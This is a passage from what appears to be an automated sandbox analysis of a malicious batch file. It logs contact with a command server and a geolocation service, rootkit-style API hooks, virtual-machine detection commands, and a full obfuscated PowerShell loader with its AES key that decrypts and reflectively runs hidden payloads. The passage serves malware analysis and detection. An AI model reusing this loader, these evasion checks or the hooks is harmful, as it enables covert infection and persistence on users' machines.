                                                Oct 3, 2024 14:55:32.087630987 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:32.092504025 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:32.532124996 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:32.581036091 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:32.616620064 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:32.659086943 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:32.660301924 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:32.665266037 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:32.665347099 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:32.670373917 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.044868946 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.096606016 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.194919109 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.252857924 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.397836924 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.400589943 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.400645018 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.402770042 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405527115 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405558109 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405603886 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405668974 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405697107 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405725002 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405777931 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405807972 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405875921 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405952930 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.405982971 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406035900 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406080008 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406097889 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406115055 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406143904 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406171083 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.406199932 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.752473116 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.799730062 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.935945988 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.970238924 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.975142956 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:33.975331068 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:33.980297089 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:34.356430054 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:34.409187078 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:34.507344961 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:34.530821085 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:34.535670996 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:34.536372900 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:34.541179895 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:34.909305096 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:34.956020117 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:35.071238995 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:35.109463930 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:35.114448071 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:35.114772081 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:35.119594097 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:35.481880903 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:35.534101009 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:35.632613897 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:35.657392025 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:35.664254904 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:55:35.664319992 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:55:35.669156075 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:56:00.674808025 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:56:00.680794001 CEST696949719154.216.20.132192.168.2.7
                                                Oct 3, 2024 14:56:25.721761942 CEST497196969192.168.2.7154.216.20.132
                                                Oct 3, 2024 14:56:25.727423906 CEST696949719154.216.20.132192.168.2.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 3, 2024 14:55:07.449938059 CEST5378453192.168.2.71.1.1.1
                                                Oct 3, 2024 14:55:07.671873093 CEST53537841.1.1.1192.168.2.7
                                                Oct 3, 2024 14:55:08.878645897 CEST6098953192.168.2.71.1.1.1
                                                Oct 3, 2024 14:55:08.886673927 CEST53609891.1.1.1192.168.2.7
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 3, 2024 14:55:07.449938059 CEST192.168.2.71.1.1.10x74e0Standard query (0)azure-winsecure.comA (IP address)IN (0x0001)false
                                                Oct 3, 2024 14:55:08.878645897 CEST192.168.2.71.1.1.10x9280Standard query (0)ipwho.isA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 3, 2024 14:54:06.634582043 CEST1.1.1.1192.168.2.70x61d4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                Oct 3, 2024 14:54:06.634582043 CEST1.1.1.1192.168.2.70x61d4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                Oct 3, 2024 14:54:49.902795076 CEST1.1.1.1192.168.2.70xf08fNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                Oct 3, 2024 14:54:49.902795076 CEST1.1.1.1192.168.2.70xf08fNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                Oct 3, 2024 14:55:07.671873093 CEST1.1.1.1192.168.2.70x74e0No error (0)azure-winsecure.com154.216.20.132A (IP address)IN (0x0001)false
                                                Oct 3, 2024 14:55:08.886673927 CEST1.1.1.1192.168.2.70x9280No error (0)ipwho.is195.201.57.90A (IP address)IN (0x0001)false
                                                • ipwho.is
                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.749720195.201.57.904435760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-10-03 12:55:09 UTC150OUTGET / HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                Host: ipwho.is
                                                Connection: Keep-Alive
                                                2024-10-03 12:55:09 UTC223INHTTP/1.1 200 OK
                                                Date: Thu, 03 Oct 2024 12:55:09 GMT
                                                Content-Type: application/json; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Server: ipwhois
                                                Access-Control-Allow-Headers: *
                                                X-Robots-Tag: noindex
                                                2024-10-03 12:55:09 UTC1019INData Raw: 33 65 66 0d 0a 7b 0a 20 20 20 20 22 41 62 6f 75 74 20 55 73 22 3a 20 22 68 74 74 70 73 3a 5c 2f 5c 2f 69 70 77 68 6f 69 73 2e 69 6f 22 2c 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 20 20 22 73 75 63 63 65 73 73 22 3a 20 74 72 75 65 2c 0a 20 20 20 20 22 74 79 70 65 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 22 3a 20 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 20 20 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 20 22 4e 41 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72
                                                Data Ascii: 3ef{ "About Us": "https:\/\/ipwhois.io", "ip": "8.46.123.33", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "New Yor


                                                Code Manipulations

                                                Function NameHook TypeActive in Processes
                                                ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:08:53:53
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\payload.cmd" "
                                                Imagebase:0x7ff75e990000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:1
                                                Start time:08:53:53
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:08:53:53
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Model
                                                Imagebase:0x7ff6d12f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:4
                                                Start time:08:53:53
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                                Imagebase:0x7ff6d4a50000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:5
                                                Start time:08:53:54
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Manufacturer,Model
                                                Imagebase:0x7ff6d12f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:6
                                                Start time:08:53:54
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                                Imagebase:0x7ff6d4a50000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:8
                                                Start time:08:53:56
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\payload.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
                                                Imagebase:0x7ff75e990000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:08:53:56
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:08:54:04
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WerFault.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 2064 -s 2148
                                                Imagebase:0x7ff7e77e0000
                                                File size:570'736 bytes
                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:16
                                                Start time:10:23:03
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff75e990000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:17
                                                Start time:10:23:03
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:18
                                                Start time:10:23:03
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
                                                Imagebase:0x7ff75e990000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:10:23:03
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:powershell.exe -WindowStyle Hidden
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:10:23:04
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
                                                Imagebase:0x7ff75e990000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:21
                                                Start time:10:23:04
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Target ID:22
                                                Start time:10:23:04
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Model
                                                Imagebase:0x7ff6d12f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:10:23:04
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
                                                Imagebase:0x7ff6d4a50000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:24
                                                Start time:10:23:05
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\wbem\WMIC.exe
                                                Wow64 process (32bit):false
                                                Commandline:wmic diskdrive get Manufacturer,Model
                                                Imagebase:0x7ff6d12f0000
                                                File size:576'000 bytes
                                                MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:10:23:05
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\findstr.exe
                                                Wow64 process (32bit):false
                                                Commandline:findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
                                                Imagebase:0x7ff6d4a50000
                                                File size:36'352 bytes
                                                MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:28
                                                Start time:10:23:25
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression 